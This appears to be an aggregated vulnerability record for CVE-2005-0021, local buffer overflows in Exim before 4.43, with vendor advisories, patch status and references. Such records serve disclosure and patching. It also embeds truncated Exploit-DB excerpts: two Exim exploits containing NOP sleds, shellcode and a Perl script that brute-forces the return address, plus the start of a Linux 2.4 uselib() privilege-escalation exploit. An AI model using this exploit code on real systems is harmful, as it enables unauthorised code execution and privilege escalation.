CVE-2005-0021
Published: 2005-05-02
Priority: P3 · 34 · high · 7.2 (CVSS 2.0)
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 2.62% (83.5th percentile)
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | exim4 | < exim4 4.34-10 (bookworm) | exim4 4.34-10 (bookworm) |
| university_of_cambridge | exim | <= 4.40 | — |
| university_of_cambridge | exim | — | — |
| university_of_cambridge | exim | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 7.2 | HIGH | — |
| vendor_debian | — | 7.2 | HIGH | — |
| vendor_redhat | — | 7.2 | HIGH | — |
GHSA
GHSA-4wq7-f94f-64w2: Multiple buffer overflows in Exim before 4
ghsa_unreviewed·2022-05-01
CVE-2005-0021 [HIGH] GHSA-4wq7-f94f-64w2: Multiple buffer overflows in Exim before 4
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
OSV
CVE-2005-0021: Multiple buffer overflows in Exim before 4
osv·2005-05-02·CVSS 7.2
CVE-2005-0021 [HIGH] CVE-2005-0021: Multiple buffer overflows in Exim before 4
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Ubuntu
exim4 vulnerabilities
vendor_ubuntu·2005-01-07
CVE-2005-0022 exim4 vulnerabilities
Title: exim4 vulnerabilities
Summary: exim4 vulnerabilities
A flaw has been found in the host_aton() function, which can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components. When supplying certain command line parameters, the input was not checked, so that a local attacker could possibly exploit the buffer overflow to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0021)

Additionally, the BASE64 decoder in the SPA authentication handler did not check the size of its output buffer. By sending an invalid BASE64 authentication string, a remote attacker could overflow the buffer, which could possibly be exploited to run arbitrary code with the privileges of the Exim mail server. (CAN-2005-0022)
Instructions: In general
Red Hat
security flaw
vendor_redhat·2005-01-04·CVSS 7.2
CVE-2005-0021 [HIGH] security flaw
security flaw
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Debian
CVE-2005-0021: exim4 - Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arb...
vendor_debian·2005·CVSS 7.2
CVE-2005-0021 [HIGH] CVE-2005-0021: exim4 - Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arb...
Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
Scope: local
bookworm: resolved (fixed in 4.34-10)
bullseye: resolved (fixed in 4.34-10)
forky: resolved (fixed in 4.34-10)
sid: resolved (fixed in 4.34-10)
trixie: resolved (fixed in 4.34-10)
No detection rules found.
Exploit-DB
Exim 4.41 - 'dns_build_reverse' Local Read Emails
exploitdb·2005-05-25
CVE-2005-0021 Exim 4.41 - 'dns_build_reverse' Local Read Emails
Exim 4.41 - 'dns_build_reverse' Local Read Emails
---
/*
* ripped straight off iDEFENSE advisory - so lazy I just picked
* up GDB... bored on a weeknight :(
*
* nothing to write home to mother about due to the fact that
* you need a local user account on a server and all you
* get is to read other people's emails ....
*
* not even my own shellcode. aleph1 shellcode - cut and paste job
* with nops to pad.
*
* Regards,
* Plugger aka Tony Lockett
*
*
*
*/
char bomb[288]=
/* the gear from iDEFENSE */
"::%A:::::::::::::::::" /* 21 bytes */
/* -------- */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90
Exploit-DB
Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
exploitdb·2005-01-27
CVE-2004-1235 Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
Linux Kernel 2.4 - 'uselib()' Local Privilege Escalation (2)
---
/*
* EDB Note: There's is an updated version ~ https://www.exploit-db.com/exploits/895/
*/
/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
*
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define str(s) #s
#define xstr(s) str(s)
Exploit-DB
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
exploitdb·2005-01-15
CVE-2005-0021 Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow
---
/*
This proof-of-concept demonstrates the existence of the vulnerability
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.
Brute Force fb.pl:
#!/usr/bin/perl
$cnt = 0xbffffa10;
while (1) {
$hex = sprintf ("0x%x", $cnt);
$res = system ("./exploit $hex");
printf "$hex : $res\n";
$cnt += 4;
}
exploit.c:
*/
#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include
int main (int argc, char **argv) {
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\x
References
- http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44
- http://security.gentoo.org/glsa/glsa-200501-23.xml
- http://www.debian.org/security/2005/dsa-635
- http://www.debian.org/security/2005/dsa-637
- http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.html
- http://www.idefense.com/application/poi/display?id=179&type=vulnerabilities
- http://www.idefense.com/application/poi/display?id=183&type=vulnerabilities
- http://www.kb.cert.org/vuls/id/132992
- http://www.redhat.com/support/errata/RHSA-2005-025.html
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10347